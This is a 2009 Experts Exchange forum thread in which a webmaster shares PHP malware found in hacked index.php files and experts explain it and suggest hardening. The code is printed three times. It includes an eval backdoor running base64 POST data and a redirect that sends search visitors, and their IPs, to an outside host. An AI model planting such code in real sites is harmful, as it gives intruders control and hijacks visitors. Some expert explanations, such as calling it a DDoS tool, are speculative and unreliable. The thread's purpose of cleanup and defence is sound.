?
Solved

Boards not loading properly after attack

Posted on 2009-05-15
4
Medium Priority
?
909 Views
Last Modified: 2013-11-11
Today my site suffered an attack (again) and  several index.php pages were deleted and changed with their own files from the hackers. Now i have reversed the damages, but my boards are not loading properly. what can be going wrong? the rest of the site is running smoothly, this is the code they hackers have set in the -now deleted- indes files
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Open in new window

0
Comment
Question by:axtur
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
4 Comments
 
LVL 34

Expert Comment

by:Beverley Portlock
ID: 24399440
It seems to be counting traffic. I have not gone into it in detail, but that is what it seems to be doing. I have attached a reformatted version so you can study it in detail

If the site is not running properly then check for .htaccess files and see what they contain. Your FTP client may need a setting to "Show hidden files"
<?php
 
$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
	$a = base64_decode($a);
	eval ($a);
}
function get_counter() {
	$ip = $_SERVER['REMOTE_ADDR'];
	$uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
	if ($uniq === false) {
		return false;
	}
	if ($uniq == "go") {
		return true;
	}
	return false;
}
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
	if (get_counter()) {
		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
		die();
	}
}
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
	if (get_counter()) {
		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
		die();
	}
}
?>

Open in new window

0
 
LVL 3

Accepted Solution

by:
markh789 earned 2000 total points
ID: 24400929
The script, is used as a ddos spot.
Let me explain what there doing, they have bots set to the page, to open it, using a botnet. Not only will the cause to much traffic though it will open http://uniqtds2.com/tds_u.php?dname=*var*, this php script could be doing.. anything, they also have a php Eval(); set up so they can run there own PHP commands, the bots may still be trying to access files. Check your apache logs and see what files there accessing, if its from a random file then use htacces to block that file (look in error.log, something like that).

You should try disabling the function file_get_contents for a few weeks and see if any changes happen.

They could also be trying to make profit off adverts' by redirecting all your users to a porn website, I've seen this done before - and they will register, enter cc details, etc, spam happens money loss, you go it they will do it. Although, since there bots are opening the advert around 10 times / second they get 10 cents a click.. there using your website as a money-maker!

I can recommend is to try and block uniqtds2.com with something like OpenDNS.

Disable the following functions for security:
apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

In your php.ini, if your on a host, request for them to do it for you.

Disabling them functions will help block shells, if you want you can also turn display_errors to false in your php.ini.

Right now, you should be checking EVERY file even .txt files to see if any of the code is there, try upload upgrade files on your board to see if that fixes it.

I've added a few comments to the PHP code, take a look.

If it's only like - 20 bots try blocking all the bots I.P's in .htaccess.
Order Allow, Deny
Allow from *
Deny from bot1
Deny from bot2
Deny from bot3
Deny from bot4
Deny from bot5

(that may be incorrect)
<?php
 
$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
        // Decode base64 code
        $a = base64_decode($a);
        // Run the case64 code
        eval ($a);
}
function get_counter() {
        $ip = $_SERVER['REMOTE_ADDR'];
        // This could be where the ddos is coming from.
        $uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
        if ($uniq === false) {
                return false;
        }
        if ($uniq == "go") {
                return true;
        }
        return false;
}
// Grabs referral, it also checks for bot.htm in the referral 
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
// Checks to see if "yahoo" or "slurp" is in the referral 
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
?>

Open in new window

0
 

Author Comment

by:axtur
ID: 24406123
I have checked the code and I don't see anything strange on it, the only changed file (index.php) has been reverse, no other files have been found.

what can i do? How can i see the hidden files?
0
 
LVL 3

Expert Comment

by:markh789
ID: 24409564
file_get_contents could be used a ddos point, to download.
You can easily set bots to that page to tell the server to download the file as many times as it wants.

If you can run shell files you can run the shell line command:
    ls -a /PATH/HERE

Replace /PATH/HERE with you public_html dir, and you can check it for files, etc.

Did you disable the functions:

apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

If you did your fine from further attacks.

If you want ddos protection on your serve then look at what i found here:

Run this in shell:
cd /usr/src
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
tar xfz mod_evasive_1.10.1.tar.gz
cd mod_evasive
type apxs

THEN edit your httpd.conf file and add:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 300
</IfModule>

Change your values if needed,

If you have root that is.

If not ask your host for some better ddos protection.
0

Featured Post

Get proactive database performance tuning online

At Percona’s web store you can order full Percona Database Performance Audit in minutes. Find out the health of your database, and how to improve it. Pay online with a credit card. Improve your database performance now!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Build an array called $myWeek which will hold the array elements Today, Yesterday and then builds up the rest of the week by the name of the day going back 1 week.   (CODE) (CODE) Then you just need to pass your date to the function. If i…
In this blog post, we’ll look at how using thread_statistics can cause high memory usage.
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…
The viewer will learn how to create and use a small PHP class to apply a watermark to an image. This video shows the viewer the setup for the PHP watermark as well as important coding language. Continue to Part 2 to learn the core code used in creat…
Suggested Courses

752 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question